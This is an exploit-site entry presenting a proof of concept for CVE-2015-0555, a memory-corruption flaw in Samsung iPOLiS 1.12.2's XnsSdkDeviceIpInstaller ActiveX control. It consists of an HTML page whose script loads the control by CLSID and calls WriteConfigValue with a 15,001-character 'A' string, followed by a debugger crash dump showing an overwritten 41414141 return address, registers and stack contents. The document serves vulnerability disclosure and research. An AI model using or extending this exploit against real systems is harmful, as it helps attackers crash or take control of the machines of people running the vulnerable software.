
Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue PoC

23 Feb 2015 | Reported by Praveen Darshanam | Type: zdt | Source: 0day.today

<!--
# Exploit Title: (0day)Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555)
# Date: 22/02/2015
# Exploit Author: Praveen Darshanam
# Vendor Homepage: https://www.samsung-security.com/Tools/device-manager.aspx
# Version: Samsung iPOLiS 1.12.2
# Tested on: Windows 7 Ultimate N SP1
# CVE: 2015-0555
-->
 
<html>
<!--
Vulnerability found and PoC coded by Praveen Darshanam
http://blog.disects.com
CVE-2015-0555
targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
prototype  = "Function WriteConfigValue ( ByVal szKey As String ,  ByVal szValue As String ) As Long"
memberName = "WriteConfigValue"
progid     = "XNSSDKDEVICELib.XnsSdkDevice"
Operating System = Windows 7 Ultimate N SP1
Vulnerable Software = Samsung iPOLiS 1.12.2
CERT tried to coordinate but there wasn't any response from Samsung
-->
<head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>
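<script>
// szKey argument: 15001 'A' (0x41) characters, the oversized input that triggers the crash
var arg1 = "";
// szValue argument: an arbitrary short string
var arg2 = "praveend";

for (var i = 0; i <= 15000; i++)
{
    arg1 += "A";
}

// The call faults inside XNSSDKDEVICE; the stack trace below shows a return address of 41414141
target.WriteConfigValue(arg1, arg2);

</script>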
</html>
 
<!--
#############Stack Trace####################
Exception Code: ACCESS_VIOLATION
Disasm: 149434  MOV AL,[ESI+EDX]
 
Seh Chain:
--------------------------------------------------
1   647C7D7D    mfc100.dll
2   647D0937    mfc100.dll
3   64E242CA    VBSCRIPT.dll
4   77B3E0ED    ntdll.dll
 
 
Called From                   Returns To
--------------------------------------------------
XNSSDKDEVICE.149434           41414141
41414141                      414141
414141                        3DA4C4
3DA4C4                        mfc100.647790C1
mfc100.647790C1               56746C75
 
 
Registers:
--------------------------------------------------
EIP 00149434
EAX 00003841
EBX 00609FB0 -> 0015A564
ECX 00003814
EDX 00414141
EDI 0000008F
ESI 0000008F
EBP 002BE5FC -> Asc: AAAAAAAAAAA
ESP 002BE564 -> 0000000C
 
 
Block Disassembly:
--------------------------------------------------
149423  XOR EDI,EDI
149425  XOR ESI,ESI
149427  MOV [EBP-8C],ECX
14942D  TEST ECX,ECX
14942F  JLE SHORT 00149496
149431  MOV EDX,[EBP+8]
149434  MOV AL,[ESI+EDX]      <--- CRASH
149437  CMP AL,2F
149439  JNZ SHORT 00149489
14943B  MOV ECX,EBX
14943D  TEST ESI,ESI
14943F  JNZ SHORT 0014944D
149441  PUSH 159F28
149446  CALL 0014F7C0
14944B  JMP SHORT 00149476
 
 
ArgDump:
--------------------------------------------------
EBP+8   00414141
EBP+12  003DA4C4 -> Asc: defaultV
EBP+16  647790C1 -> EBE84589
EBP+20  FFFFFFFE
EBP+24  646CBE5C -> CCCCCCC3
EBP+28  0000001C
 
 
Stack Dump:
--------------------------------------------------
2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00  [................]
2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41  [................]
2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
 
-->

#  0day.today [2018-01-08]  #
